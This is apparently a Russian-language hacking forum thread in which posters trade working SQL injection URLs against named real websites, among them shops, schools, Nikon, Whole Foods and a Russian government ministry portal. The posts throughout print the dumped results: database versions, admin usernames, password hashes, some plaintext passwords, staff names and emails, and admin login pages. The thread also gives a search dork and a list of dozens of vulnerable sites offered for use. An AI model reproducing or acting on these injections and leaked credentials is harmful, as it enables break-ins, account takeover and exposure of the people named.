http://www.vents-spb.ru/products/decor/index.php?cat_id=-234+union+select+1,2,concat_ws(0x3a3a,database(),v ersion()),4,5,6,7,8+from+mysql.user+/*+&item_id=713
sotern::4.1.22

http://www.bosch-home.com.ua/page.php?item_id=-55'+union+select+1,2,LOAD_FILE(0x2F7573722F7777772 F6273682F68746D6C2F696E6465782E706870),4,5,6,7,8,9 +from+mysql.user+/*+

http://www.siemens-pt.com.ua/?item_id=-3'+union+select+1,2,LOAD_FILE(0x2F7573722F7777772F 6273682F68746D6C2F636F6E6669672E706870),4,5,6,7,8, 9+from+mysql.user+/*+
PS папку куда можно залить шелл ненашёл((

Ну вот еще одна итка
mysqld-5.0.27
http://www.newsway.it/notizie/speciale.asp?idnotizia=-17863+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17/*

Київський завод "Росинка"

http://www.rosinka.ua/detnews.php?id=-82/**/UNION/**/SELECT/**/111111111111

Database Version: 4.1.22
Database name: rosinka
User name: u_rosinka@localhost

http://www.superkrovlia.ru/files/popup.php?id=-51+union+select+1,2,3,4,database(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30+/*+
vms60_skov

http://www.vniikp.ru/info_page.phtml?item_id=-2108+union+select+concat_ws(0x3a3a,login,password) ,2,3,4,5,6+from+admins+--+
admin::202cb962ac59075b964b07152d234b70 - 123

http://www.ipk-shop.ru/index.php?menu_id=12&type_id=52&subtype_id=1084&item_id=-46236+union+select+1,2,3,4,database(),6,7,8,9,10,1 1,12,13+from+mysql.user+--+&step=2'
ipkshop

http://www.mgr-n.ru/base.php?tipsd=2&o=1'&variant=-1+union+select+1,2,3,4,5,6,database(),8+/*+
mgr_n_db

http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,concat_ws(0x20,versio n(),user(),database()),7+from+guncel
version 5.0.67-community
user gshaber_gshaber@localhost
database gshaber_gshaber


table of users
http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,table_name,7+from+inf ormation_schema.tables+limit+28,1

columns
http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,column_name,7+from+in formation_schema.columns+where+table_name=char(112 ,111,108,108,95,117,115,101,114)+limit+1,1
and
http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,column_name,7+from+in formation_schema.columns+where+table_name=char(112 ,111,108,108,95,117,115,101,114)+limit+2,1

http://gshaber.net/guncel.php?guncel_id=-14572+union+select+1,2,3,4,5,concat_ws(0x20,userna me,userpass),7+from+poll_user


haber 0530e22dea41e24a039563139cdc215e

Strategic Evacuation Systems Corp

http://sescorp.us/article.php?sid=13+UNION+SELECT+1,2,3,4,5,@@versio n,7,8,9,10,11+++LIMIT+1,1/*

version()=4.1.20

стоят фильтры

http://www.kasparov.ru/subject.php?id=-74'+union+select+1/*

--------------------------------------------------------

Database Version: 5.0.22-log
User name: root@192.168.1.70
Database name:kasparov_main_v3


forum админ

--- gek : valentina ---

---------------------------------------------------------

PR4, ТИЦ 60
http://www.artosgroup.ru/super.php?id=141+and+substring(version(),1,1)=4

Page Rank: 9

http://www.indiana.edu/~jofr/review.php?id=822+and+substring(version(),1,1)=3

я в расстройстве.....

PR 6
http://www.cfe.ru/eng/news/?nid=25+and+substring(version(),1,1)=3/*

----

PR2, ТИЦ 20
http://geshe.ru/news.php?nid=125+union+select+1,2,3,4,5,6,7,8,conc at_Ws(0x3a,version(),user(),database())
5.0.41-community-log:kammal_libgeshe@98.130.2.10:kammal_geshe

PR 4
http://www.vrijeschooldenhaag.nl/actueel.php?id=-11+union+select+1,2,concat_ws(char(124),version(), database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19--
Database Version: 4.1.22
Database name: vrijeschool2
User name: vrijeschool2@s005.dinamite.nl

PR 6
http://studprofkom.ntu-kpi.kiev.ua/interactiv/questions/?id=-1+UNION+SELECT+1,CONCAT_ws(Version(),Database(),Us er()),3,4,5,6,7,8--
Database Version: 4.1.22
Database name: sitemaker
User name: profkom@localhost

http://www.velozavod.com/window.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57u23645@10.10.153.169:u23645_velo zavod:5.0.67-log

wholefoodsmarket.com pr 7
inj:
http://www.wholefoodsmarket.com/recipes/recipe.php?recipeId=-2547'
Данные БД:

Database Version: 5.0.77-log
Database name: wfm_recipes
User name: wfm_recipes@172.16.122.36

Таблица users 190к записей

http://www.wholefoodsmarket.com/recipes/recipe.php?recipeId=-2547 UNION SELECT+1,concat_ws(0x1,uid,name,email,password,pwr key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27 FROM wfm_myrecipes.users limit 190000,1--

http://prager.com/sales/index.php?id=104'+and+substring(version(),1,1)=3+--+

version: 3.23.58-log
database: prager
user: basic_user@localhost

Сайт:

http://cod5zombies.com/

Версия:

http://cod5zombies.com/dl.php?id=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19--

Таблицы:
http://cod5zombies.com/dl.php?id=-3+union+select+1,2,3,unhex(hex(table_name)),5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19+from+INFORMATION _SCHEMA.TABLES--


e107_users
http://cod5zombies.com/dl.php?id=-3+union+select+1,unhex(hex(column_name)),3,4,5,6,7 ,%208,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.columns+where+table_name=0x653130375f7 5736572--
Логин:Пасс в md5

http://cod5zombies.com/dl.php?id=-3+union+select+1,concat_ws(0x3a,user_loginname,use r_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19+from+e107_user--

Огромное спасибо R1dex :)

[PR 4]
http://www.noswizard.com/product_desc.php?id=-101+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52
4.1.22-standard-log:noswizards:noswizards@localhost

[PR 1]
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27
5.0.77-community:cancuncl_classcancun:cancuncl_clcunmx@lo calhost
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(table_name),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27+from+information_schema.tables
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(column_name),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27+from+information_schema.columns+where +table_name=0x6672656574706c62616e6e6572735f61646d 696e
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,id,admin_name, pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27+from+freetplbanners_admin
id:admin_name:pwd
1:ricardo:rjBcnBN

[PR 0]
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,conca t_ws(0x3a,version(),database(),user()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6
5.0.51a-log:sodager:sodager@boscgi1203.eigbox.net
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group _concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26+from+information_ schema.tables
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group _concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26+from+information _schema.columns+where+table_name=0x7362636c6173736 9666965645f61646d696e
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,conca t_ws(0x3a,id,admin_name,pwd),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+sbc lassified_admin
id:admin_name:pwd
1:admin:aliadmin

PR4
http://www.sonorika.com/v2/people/pop.php?Id=-8513+union+select+1,concat_ws(0x3a,version(),user( ),database()),3
5.1.31-log:sonorika@62.149.199.54

www.imperialeg.com

http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x0b,version(),user(),database()),11,12,13,14 ,15,16,17,18,19


Версия - 5.0.77-community
Юзер - palmacom_user@localhost
БД - palmacom_db

Табличка admin:

http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x0b,id,username,password),11,12,13,14,15,16, 17,18,19+from+admin

admin
89a99c4142817128be9eb8e7c8966592

Админка:
http://www.imperialeg.com/admin/
Username - admin
Password - (нужно расшифровать 89a99c4142817128be9eb8e7c8966592)

http://www.rivnepost.rovno.ua/showarticle.php?art=-005319+UNION+SELECT+0,1,2,3,4,concat_ws(0x0b,user( ),versi on(),database()),6,7,8,9,10,11,12,13,14,15,16+--+

rivnepost@localhost
4.1.22
rivnepostdb

http://sibkray.ru/vn/index.php?id=-97473+UNION+SELECT+0,concat_Ws(0x0b,user(),version (),datab ase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24+--+
sibkray_site@localhost
5.0.45
sibkray_site

Таблы
http://sibkray.ru/vn/index.php?id=-97473+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_na me),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+FROM+INFORMATION_SCHEMA.COLUMNS+LIM IT+177,1+--+

https://www2.nikon.de/school.php?id=0138+union+select+1,2,3,concat_ws(0x 3a,version(),user(),database()),5,6,7/*
5.0.32-Debian_7etch10-log:nikon@localhost:nikon
куча таблиц, заинтересовала auth_user: user_id, username, password, perms.
Сдампим данные:

9e3cc66e1d74a0146cd1894b467c0d78:Werner:Jobs2003:S tellenangebote

650197885626a3fe3fab2acce484184a:katthoefer:ply44b s:User-Verwaltung,Events,Stellenangebote,Workshops,H&auml;ndle r,News,Presse,H&auml;ndlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihger&auml;te,Testergebnisse,H&auml; ndlerliste Aktionen

a38407df0c41b6131a06e5a15c3d6878:Jasper:nrap2348go :Events,Workshops

24565ae53b131bcbfa6be713e73e4195:Jacobs:t77jpftspw :User-Verwaltung,Events,Stellenangebote,Workshops,H&auml;ndle r,News,Presse,Service,Newsletter,H&auml;ndlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihger&auml;te,Testergebnisse,Ne wsletter versenden,Datei-Anh&auml;nge verwalten

89059f997e1f01298b0ce8b79fdd6a37:Exner:nvd23r904:E vents,Workshops

04aa721901ff6d81d06c1385d731de75:student:4hvt7cd:E vents,Workshops,Produktbild-Datenbank,Testergebnisse

cf7e1c0ca503b386b34d61b4bfdd7744:Sperwer:R2dnc:Eve nts

22e91f6b1eb5da862837286f3e8ffb14:kickingereder:jnd 242go:User-Verwaltung,Events,Stellenangebote,Workshops,H&auml;ndle r,News,Presse,Service,Newsletter,H&auml;ndlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihger&auml;te,Testergebnisse,Ne wsletter versenden,Datei-Anh&auml;nge verwalten

f0a7962c9acfa9b994569bc675b2e0a0:Deines:3sdg339z:E vents,Workshops

так же есть таблица: auth_user_md5, с такими же полями. Дамп

c14cbf141ab1b7cd009356f555b607dc:kris:098f6bcd4621 d373cade4e832627b4f6:admin
135ff2008ba9e9e21084c045d0c5825d:nikon:d81e22674cc 2c1c62b84500e436e6ad8:admin

http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,table_name,3,4,5,6+from+informat ion_schema.tables+/*+
1::ekar@yandex.ru::100::b358721da28f6306c17fc80e4a 7eaa7d3abe300a

http://woman1.ru/vote.php?nom=-4'+union+select+1,2,table_name,4,5,6,7+from+inform ation_schema.tables+/*+

http://board.ebashmetall.ru/index.php?catid=-29+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+10,100+/*+

http://avtoton.net/?id=cat&type=-58+union+select+1,concat_ws(0x3a3a,login,pass)+fro m+users+/*+
avtoton::080383
http://avtoton.net/admin/

http://kraskolizey.com/books-describe.php?id=-4+union+select+1,user_name,3,password,5,6,7,8+from +users+limit+5,1+/*+
admin::neadmin
kadmin::kolizey
webmaster::webmaster
http://kraskolizey.com/admin/

http://www.wpcsd.org/education/components/form/default.php?sectiondetailid=118+and+substring(vers ion(),1,1)=5


http://longisland.newsday.com/schools/school.php?id=774940+and+substring(version(),1,1)= 5/*

http://plintu.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*

admin:$1$cOzWWNQQ$4S9o1bLzmq1MIhAcSwUdR.

==============================
jokester:
не подскажешь что мне нужно сделать, что-бы ты не переписывал тему сначала?

Неужели так трудно чекать скули на антибояне?
http://bestquest.info/sql/
bid4tackle.com БОЯН

Я устал удалять и править твои посты, не будешь соблюдать правила, буду просить о бане

http://www.1mileup.com/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users

http://www.fibercity.ru/?q=art&id=-44+union+select+1,2,3,concat_ws(0x3a3a,login,pass) +from+users+/*+
superAdmin::cce37934e8857d4fab68c3bfc4946662

http://www.peskostruyka.biz/index.php?ID=-2+union+select+1,2,database(),4,5,6,7,8,9,10,11+/*+
z105024_pesk

http://allina.ru/tovar.php?tovar=65&tovid=-247+UnIoN+SeLecT+1,2,database(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+/*+
z82987_allina

[PR]5
www.badtasterecords.se

http://www.badtasterecords.se/bands.asp?id=-1+union+select+concat_ws(0x203a20,version(),databa se(),user(),@@version_compile_os)--
version()4.0.27-standard
database()badtaste_d
user()badtaste@w2ks4.fsdata.se
os pc-linux-gnu


______________________

[PR]3
www.podarunok.net
http://www.podarunok.net/consulting/article/?id=-1+union+select+1,2,concat_ws(0x203a20,version(),da tabase(),user(),@@version_compile_os),4,5,6,7,8--
version()4.1.22-log
database()podarunok
user()podarunok@beta
os portbld-freebsd5.5

______________________
[PR]4
www.frw.ca

http://www.frw.ca/rouge.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x203a20, version(),database(),user())--
version()4.0.18-Max
database()frw
user()frw@web49

______________________

[PR]2
www.halcyonpix.com

http://www.halcyonpix.com/view.php?id=-42+union+select+1,concat_ws(0x203a20,version(),dat abase(),user(),@@version_compile_os),3,4,5,6,7,8,9 ,10,11,12--
version()4.1.22-MAX-LOG
database()HALCYONPIX1
user()HALCYONPIX1@68.178.254.234
os UNKNOWN-LINUX-GNU


______________________
[PR]1
oldshipbar.ru

http://oldshipbar.ru/review.php?id=-1+union+select+1,concat_ws(0x203a20,version(),data base(),user(),@@version_compile_os),3--

version()5.0.67-LOG
database()U56014_OLDSHIP
user()U56014_OLDSHIP@10.10.153.200
os UNKNOWN-FREEBSD6.1

[tables]

http://oldshipbar.ru/review.php?id=-1+union+select+1,table_name,3+from+information_sch ema.tables--

[PR 2]
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.51-2.dotdeb.0-log:funk_hair:sqluser@localhost

data from table 'mysql.user'
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,user,password,fil e_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql .user--
debian-sys-maint:*8032B8C802DD880BA3E2455006707E05D247C94B
sqluser:2b50e1054b3cb08a:Y
data from table 'user'
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10,11,12,13,14,15+from+information_schema. columns+where+table_name=0x75736572
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user
id:username:password
2:Administrat0r:ac73732f2ddfaae30a3834e87eadb79efe 39eb2f
307:system:317f1e761f2faa8da781a4762b9dcc2c5cad209 a
308:website:3ab3e0b020a6d41f3d259ddd3ed8ff27384383 9b
http://www.funkhair.com.au/login.php

_http://cititour.com/NYC_Movies/index.php?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables--
version 5.x.x.x

_http://www.bhnyc.com/category.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13--
version 4.x.x.x

_http://www.arcadevillage.com/agora/displaybest2.php?id=-1+union+select+version(),2--
version 5.x.x.x

_http://www.nycglass.com/index.php?id=-1+union+select+1,2,concat_ws(0x3b,name,pass),4,5,6 ,7+from+users--
хеш трудный(

_http://www.armofthesea.org/repertoire.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13--
4.x.x.x

http://rss.skyride.com/item.php?id=-1+union+select+1,concat_ws(0x3b,user,password),3,4 ,5,6+from+mysql.user--

_http://www.info.pulawy.pl/news.php?id=-3048+union+select+1,concat_ws(0x3b,pass,user()),3, 4,5,6,7,8,9,10,11,12,13+from+users--

[PR 3]
http://www.soulshoes.co.nz/products.php?id=-3+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())
4.0.26:soulshoes_co_nz:soulshoe@localhost
=====================
[PR 3]
http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,v ersion(),database(),user())+using+latin1),5,6,7,8, 9,10
5.0.18-nt:_production_app:root@localhost

data from table 'mysql.user'
http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,u ser,password,file_priv)+using+latin1),5,6,7,8,9,10 +from+mysql.user
root:*46CFC7938B60837F46B610A2D10C248874555C14:Y
=====================
[PR 3]
http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30--&searchpage=0&sql1=product_new=0&newarr=n
5.0.22-log:sktm:sktm@localhost

data from table 'mysql.user'
http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,user,passw ord,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+mysql.use r--&searchpage=0&sql1=product_new=0&newarr=n
root:2a4f0ece50a065f3:Y
=====================
[PR 2]
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15
5.0.51-2.dotdeb.0-log:loddon_heating:sqluser@localhost

data from table 'mysql.user'
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,user,password,fil e_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql .user
debian-sys-maint:*8032B8C802DD880BA3E2455006707E05D247C94B
sqluser:2b50e1054b3cb08a:Y
data from table 'user'
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user
2:Administrat0r:ac73732f2ddfaae30a3834e87eadb79efe 39eb2f
http://www.loddonheatingcooling.com.au/login.php
=====================
[PR 0]
http://blossomsflorists.biz/product.php?id=-32+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11
4.1.22-standard:blossom_shop:blossom_gordon@localhost

http://www.nordestfm.ro/index.php?page=6&&act=news&cid=3+AND+SUBSTRING((version()),1,1)=x


Version : 4.1.22-standard-log
User : nordestf_ne@localhost
Database : nordestf_neG
Os : pc-linux-gnu

http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,concat_ws(0x3a,user(),versi on(),database()),5--

skuns_main@77.221.130.10:5.0.32-Debian_7etch1-log:skuns_main
TABLES:

http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,group_concat(table_name,0x3 C62723E),5+from+information_schema.tables--


CHARACTER_SETS
,COLLATIONS
,COLLATION_CHARACTER_SET_APPLICABILITY
,COLUMNS
,COLUMN_PRIVILEGES
,KEY_COLUMN_USAGE
,ROUTINES
,SCHEMATA
,SCHEMA_PRIVILEGES
,STATISTICS
,TABLES
,TABLE_CONSTRAINTS
,TABLE_PRIVILEGES
,TRIGGERS
,USER_PRIVILEGES
,VIEWS
,articles
,articles_view
,banners
,catalog_desc
,catalog_main
,catalog_setup
,catalog_trans
,catalog_value
,company_info
,content
,content_admin
,content_images
,content_main
,customers
,faq
,faq_view
,gallery_folders
,gallery_photos
,gallery_view
,guest_book
,headers
,ip_list
,languages
,news
,news_view
,order_description
,page_banners
,page_banners_logic
,polls_questions
,polls_topics
,titles

PR:3
ТИЦ:100

PR 1
http://www.aronis.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--
4.1.22-standard-log


PR 1
http://japanmoto.com.ua/news.php?id=-1+union+select+1,2,3,4--
5.0.67-log


PR 3
http://www.gc.ua/en/news.php?id=-568+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15

,16,17,18,19,20--
5.0.51a-community


PR 4
http://www.franchising.org.ua/a-news/news.php?id=-183+union+select+1,2,3,4,5,6,7,8,9,10--
5.0.32-Debian_7etch10-log


PR 3
http://www.kiosks.com.ua/news.php?id=-183+union+select+1,2,3,4,5,6,7,8--
4.1.22-log


PR 2
http://bis-land.ru/news.php?id=-183+union+select+1,2,3,4,5,6,7--
5.0.51a-community

http://www.dok3.ru/individ.php?id=-1+union+select+1,table_name,3,4+from+information_s chema.tables--

http://www.eutempusglobe.org/news.php?id=-23+union+select+1,version(),database(),user(),5,6, 7--

5.0.51a-community
cibs1_eutempusglobe
cibs1_eutempusgl@localhost

http://doprabota.ru/viewcompany.php?eid=2467%27+union+select+1,2,conca t_ws(0x3a,version(),database(),user()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6+from+admin+limit+1,1/*
version():5.0.27-log
database():lj_mausiru
user():lj_mausiru@localhost

http://doprabota.ru/viewcompany.php?eid=2467%27+union+select+1,2,group _concat(username,0x3a,password),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ admin+limit+1,1/*

admin:Gj,tlf37

http://doprabota.ru/admin/

http://www.vivatoshka.ru/article.php?id=-1+union+select+1,2,table_name+from+information_sch ema.tables--

http://www.avtoschool.okis.ru/admin/index.php?act=edit_page&id=-17'+union+select+1,2,3,4,5,6,7+--+
Пасс : 7a30b2702d

Версия: 4.1.25-log
Имя: avtoschool_F@localhost

_http://www.rijkheusden.nl/Content/base.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,password,user()),13+from+users--

_http://www.capinov.fr/base.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3b,user(),ver sion()),7,8,9,10,11,12,13,14,15,16,17+user--

http://www.top.mylove.az/top.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a,id,login,pass),15,16,17,18,19,20,21+from +std_usr/*

Кстати, file_priv = Y )))))

ADMINISTRATIVE REFORM IN THE RUSSIAN FEDERATION
PR:7

http://ar.economy.gov.ru/ru/about/el_russia/contracts/?id4=48+union+select+concat_ws(0x3a,0x3a3a3a3a3a3a ,version(),database(),user())
5.0.51a-3ubuntu5.4-log:admreforma:admreforma@localhost

http://ar.economy.gov.ru/ru/about/el_russia/contracts/?id4=48+union+select+concat_ws(0x3a,ADMINISTRATOR_ ID,FIO,LOGIN,PASSWORD_MD5,EMAIL)+from+ADMINISTRATO R+limit+0,1
Администратор РБК:admin_rbc:740aa53d501866090420d91cc8715f11
Администратор МЭРТ:admin_mert:348b4cf16850341c05e800c9db1fbf 7f:nikitin@economy
Администратор Липецкой области:admin_lipetsk:893a96ef45b77f05fefd8 8e5efaf1e85
Администратор Кемеровской области:admin_kemerovo:8a6100d108f385341e0e febde6f729
Щеглев Дмитрий (РБК):dsheglev:4b40bc3fa445b95985a4c03f9b4f904c :dsheglev@armd.ru
Контент-менеджер МЭРТ:cm_mert:35cbf3aa987f24d79c2e1535a9e2d752
Фоломеев Алексей Олегович (Россвязьохранкультура):folom eev:d2da47d7bf74c44d5713
Игнатьева Марина Алексеевна (Росинформтехнология):mignatiev a:64148e7ccecce7f762
Татиевская Людмила Ефимовна (Росархив):ltatievskaya:43fcaed0424d692265 24849abc6
Суворинов Александр Владимирович (Роснаука России):asuvorinov:74510d4109d97e8de
Гребёнкин Михаил Александрович (Министерство образования и науки):mgrebenkin:11
Фоломеев Алексей Олегович (Россвязьохранкультура):afolo meev:96827c8ca4eb90a272b
Клочко Вячеслав Николаевич (ФСТЭК России):Klochko_VN:caf2eabc3a8a05d775fe40107 a
Шелепов Павел Алексеевич (ФРС):shelepov:f67c3340e72b9c2f3d8b624d45f9fd36 :00_ros
Лукаш Н.С. (МЧС России):nlukash:89e9fe2f52a6efab589822a4c6b0 c20e:lukash@mchs.go
Байчурин Ильшат Усманович (Министерство обороны РФ):ibaychurin:8417f0066e298442
Росгидромет (Росгидромет):rosgidromet:ece26c9d44776 9e746756582f29bbadb:resurs@mАдминистрат ор ВШЭ:admin_hse:d8e70fec6340580de2bd94ea68054f92
Беляев Виктор Олегович (Роспатент):adminm@fips.ru:6354691843e039 089c37905d256b6
Контент-менеджер РБК:content_rbc:a92536440b13ac73008545206703ee2 b:yulia-682@ya.
Смирнова Жанна (ВШЭ):smirnova:88c2bf7534ee64045bfbaabf36789ff9
Дутышев Владимир:vdutyshev:f1d9b56fbb8bbb412d8fbcf 0806f0684:vdutyshev@armd.ru
Зайцева Александра:azaitseva:b4a5ac76591e953c2d9 bdf26ecfb1203:azaitseva@armd.ru
Администратор ВБ:admin_wb:d595b33986c2e5b1a7b289edc030a2ff

http://www.universitateacraiova.ro/stire_detalii.php?id_item=2851+uNiOn+SeLecT+1,conc at_ws(0x3a,version(),database(),user(),@@version_c ompile_os),3,4,5,6,7,8,9,10,11,12,13,14,15--&titlu=Asalt%20final%20pentru%20Europa


Version: 5.0.77-percona-highperf-b13-log
Database : universitateacraiova_ro_bd
User : MihaiViteazu@192.168.88.40
Os : unknown-linux-gnu

http://universitateacraiova.ro/admin/login.php

Login: Adrian
Password: Мичаел (транслит, превед турецким хакерам)

Официальный сайт правительства республики Абхазия, Грузия

http://www.abkhazia.gov.ge/index.php?lng=eng&page=view_news&id=-12+union+select+1,2,concat_ws(0x20,version(),user( ),database()),4,5,6,7--

4.1.22-standard
abkhazia_abkhazi@localhost
abkhazia_abkhazia

<<Производство пластиковых панелей>>
http://www.plastek-tlt.ru/remont.php?id=-144965+union+select+concat_ws(0x3a2a3a,version(),d atabase(),user(),@@version_compile_os)--+
4.1.25-log:*:db00128047:*:00128047@localhost:*:unknown-freebsd4.10

Нашёл бажный двиг
Поиск таких сайтов в гугле:
inurl:guest_book_sp/show_user.php?id=

Пример одного из таких сайтов:
www.kwota.ru
[PR: 2 ТиЦ: 230]
9 полей
mysql.user :
http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,concat_ws(0x0b,user,password) ,3,4,5,6,7,8,9+from+mysql.user/*
root ;*FF80FA6E66C1D5FFEABE55E57F02EE3691459C26
Есть табличка users
http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,group_concat(0x0b,id),3,4,5,6 ,7,8,9+from+users/*

Возможно прочесть только колонку id ((


Вот на гуглил базу с этим двигом везде есть sql inj))
(105 уязвимых сайтов)
Пользуйтесь (ни одного баяна):

www.21studio.ru
www.accelgraphics.com
www.all-languages.org
www.ankey.ru
www.antiarmy.net
www.aregard.com
www.aressel.com
www.arhport.ru
www.atilimtelecom.com
www.beatles-site.org
www.belmedia.ru
www.cate-blanchett.com
www.comincity.com
www.contrast-musique.com
www.crackedfinger.com
www.creasfera.com
www.deputatov.net
www.diapazon.net
www.doma4.com
www.dominique-sarraute.com
www.doublebassmaking.com
www.effport.com
www.egortitov.ru
www.elvanreklam.com
www.enorex.com
www.esezam.com
www.favorit.dn.ua
www.fizika2005.net
www.floridasawfish.com
www.flosoft-systems.com
www.fooweb.net
www.franckprovost.ru
www.go2thailand.org
www.grandsekerhotel.com
www.handitalia.net
www.harrys-stuff.com
www.hertz-security.ru
www.hightechsolutionsinc.com
www.ibcgulf.com
www.ikatel.net
www.ikatel.net
www.kamenskweb.net
www.kwota.ru
www.latitud34.net
www.leskavkaz.com
www.lgpu.lg.ua
www.makehit.com
www.media.spb.ru
www.mindsatlarge.com
www.mir-prazdnika.org
www.mncts.org
www.mncts.org
www.moscow2000.ru
www.moscow2006.com
www.myivan.com
www.namaste-bazaar.com
